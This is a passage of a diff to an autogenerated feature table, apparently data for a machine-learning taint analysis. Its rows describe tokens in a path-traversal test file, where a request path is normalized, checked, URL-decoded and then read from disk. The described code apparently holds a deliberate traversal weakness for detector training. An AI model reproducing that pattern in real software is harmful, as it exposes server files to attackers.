autogenerated/TaintedPath/normalizedPaths.js:216:19:216:28 | isAbsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:216:19:216:28 | isAbsolute | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:216:19:216:28 | isAbsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:216:19:216:28 | isAbsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:216:39:216:60 | !path.s ... h('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:216:39:216:60 | !path.s ... h('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:216:39:216:60 | !path.s ... h('..') | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:216:39:216:60 | !path.s ... h('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:216:39:216:60 | !path.s ... h('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:43 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:43 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:43 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:43 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:43 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:54 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:54 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:54 | path.startsWith | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:54 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:54 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:60 | exceptional return of path.st ... h('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:60 | exceptional return of path.st ... h('..') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:60 | exceptional return of path.st ... h('..') | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:60 | exceptional return of path.st ... h('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:60 | exceptional return of path.st ... h('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:60 | path.st ... h('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:60 | path.st ... h('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:60 | path.st ... h('..') | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:60 | path.st ... h('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:216:40:216:60 | path.st ... h('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:216:45:216:54 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:216:45:216:54 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:216:45:216:54 | startsWith | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:216:45:216:54 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:216:45:216:54 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:216:56:216:59 | '..' | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:216:56:216:59 | '..' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:216:56:216:59 | '..' | calleeImports | path | @@ -8692,6 +75073,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:216:56:216:59 | '..' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:216:56:216:59 | '..' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:216:56:216:59 | '..' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:25 | exceptional return of fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:25 | exceptional return of fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:25 | fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:25 | fs.read ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:25 | fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:25 | fs.read ... c(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:217:5:217:25 | fs.read ... c(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:217:8:217:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:217:8:217:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:217:8:217:19 | readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:217:8:217:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:217:8:217:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:217:21:217:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:217:21:217:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:217:21:217:24 | path | calleeImports | fs | @@ -8701,11 +75107,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:217:21:217:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:217:21:217:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:217:21:217:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:6 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:6 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:6 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:6 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:6 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:33 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:33 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:33 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:33 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:33 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:33 | path = ... t(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:33 | path = ... t(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:33 | path = ... t(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:33 | path = ... t(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:219:3:219:33 | path = ... t(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:219:10:219:27 | decodeURIComponent | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:219:10:219:27 | decodeURIComponent | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:219:10:219:27 | decodeURIComponent | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:219:10:219:27 | decodeURIComponent | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:219:10:219:27 | decodeURIComponent | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:219:10:219:33 | decodeU ... t(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | | autogenerated/TaintedPath/normalizedPaths.js:219:10:219:33 | decodeU ... t(path) | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:219:10:219:33 | decodeU ... t(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:219:10:219:33 | decodeU ... t(path) | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:219:10:219:33 | decodeU ... t(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:219:10:219:33 | exceptional return of decodeU ... t(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:219:10:219:33 | exceptional return of decodeU ... t(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:219:10:219:33 | exceptional return of decodeU ... t(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:219:10:219:33 | exceptional return of decodeU ... t(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:219:10:219:33 | exceptional return of decodeU ... t(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:219:29:219:32 | path | CalleeFlexibleAccessPath | decodeURIComponent | | autogenerated/TaintedPath/normalizedPaths.js:219:29:219:32 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:219:29:219:32 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | @@ -8713,6 +75144,71 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:219:29:219:32 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | | autogenerated/TaintedPath/normalizedPaths.js:219:29:219:32 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:219:29:219:32 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:221:7:221:34 | !pathMo ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:221:7:221:34 | !pathMo ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:221:7:221:34 | !pathMo ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:221:7:221:34 | !pathMo ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:221:7:221:34 | !pathMo ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:221:7:221:60 | !pathMo ... h('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:221:7:221:60 | !pathMo ... h('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:221:7:221:60 | !pathMo ... h('..') | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:221:7:221:60 | !pathMo ... h('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:221:7:221:60 | !pathMo ... h('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:17 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:17 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:17 | pathModule | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:17 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:17 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:28 | pathMod ... bsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:28 | pathMod ... bsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:28 | pathMod ... bsolute | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:28 | pathMod ... bsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:28 | pathMod ... bsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:34 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:34 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:34 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:34 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:34 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:34 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:34 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:34 | pathMod ... e(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:34 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:221:8:221:34 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:221:19:221:28 | isAbsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:221:19:221:28 | isAbsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:221:19:221:28 | isAbsolute | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:221:19:221:28 | isAbsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:221:19:221:28 | isAbsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:221:39:221:60 | !path.s ... h('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:221:39:221:60 | !path.s ... h('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:221:39:221:60 | !path.s ... h('..') | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:221:39:221:60 | !path.s ... h('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:221:39:221:60 | !path.s ... h('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:43 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:43 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:43 | path | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:43 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:43 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:54 | path.startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:54 | path.startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:54 | path.startsWith | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:54 | path.startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:54 | path.startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:60 | exceptional return of path.st ... h('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:60 | exceptional return of path.st ... h('..') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:60 | exceptional return of path.st ... h('..') | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:60 | exceptional return of path.st ... h('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:60 | exceptional return of path.st ... h('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:60 | path.st ... h('..') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:60 | path.st ... h('..') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:60 | path.st ... h('..') | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:60 | path.st ... h('..') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:221:40:221:60 | path.st ... h('..') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:221:45:221:54 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:221:45:221:54 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:221:45:221:54 | startsWith | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:221:45:221:54 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:221:45:221:54 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:221:56:221:59 | '..' | CalleeFlexibleAccessPath | path.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:221:56:221:59 | '..' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:221:56:221:59 | '..' | contextFunctionInterfaces | allowPath(requestPath, rootPath) | @@ -8721,6 +75217,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:221:56:221:59 | '..' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:221:56:221:59 | '..' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:221:56:221:59 | '..' | receiverName | path | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:6 | fs | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:19 | fs.readFileSync | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:25 | exceptional return of fs.read ... c(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:25 | exceptional return of fs.read ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:25 | exceptional return of fs.read ... c(path) | enclosingFunctionBody | req res path pathModule normalize req query path pathModule isAbsolute path path startsWith .. fs readFileSync path path decodeURIComponent path pathModule isAbsolute path path startsWith .. fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:222:5:222:25 | exceptional return of fs.read 